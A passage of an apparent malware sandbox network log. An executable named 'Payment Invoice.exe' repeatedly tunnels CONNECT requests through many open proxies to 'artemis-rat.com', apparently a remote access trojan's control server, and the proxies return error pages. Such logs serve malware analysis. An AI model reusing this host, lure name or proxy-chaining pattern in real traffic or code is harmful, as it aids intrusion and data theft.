                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1284192.168.2.453741175.183.82.22181937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.211860895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1285192.168.2.4539105.161.103.113807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.212476969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1286192.168.2.45386751.89.173.40301997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.213165045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.979991913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.980155945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.886449099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1287192.168.2.4539175.161.231.34807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.213290930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.444180965 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1288192.168.2.45381491.134.140.160489627076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.213570118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.980098009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.089585066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.183542967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.277183056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.478215933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.589600086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.776704073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.276731014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1289192.168.2.45384647.114.101.5788887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.213867903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.980077028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.303376913 CET334INHTTP/1.1 400 Bad Request
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 204
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1290192.168.2.453978104.17.16.87807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.215352058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.823626995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.983935118 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1291192.168.2.453093125.141.139.6055667076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.252429962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.217940092 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1292192.168.2.45393867.43.236.2087057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.253568888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.290201902 CET19INHTTP/1.0 200 OK
                                                                Mar 11, 2024 16:15:21.965363979 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1293192.168.2.453895139.162.151.17690507076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.253818989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:26.821552992 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1294192.168.2.452038103.217.213.14541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.253966093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1295192.168.2.453886152.32.187.16481187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.254842043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.356542110 CET131INHTTP/1.1 503 Too many open connections
                                                                Content-Type: text/plain
                                                                Connection: close
                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                Data Ascii: Maximum number of open connections reached.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1296192.168.2.454007104.25.184.189807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.255273104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.410304070 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1297192.168.2.454012172.67.182.90807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.255494118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.410358906 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1298192.168.2.452007103.118.44.13680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.261837959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1299192.168.2.453819103.120.6.46807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.261953115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.641654015 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
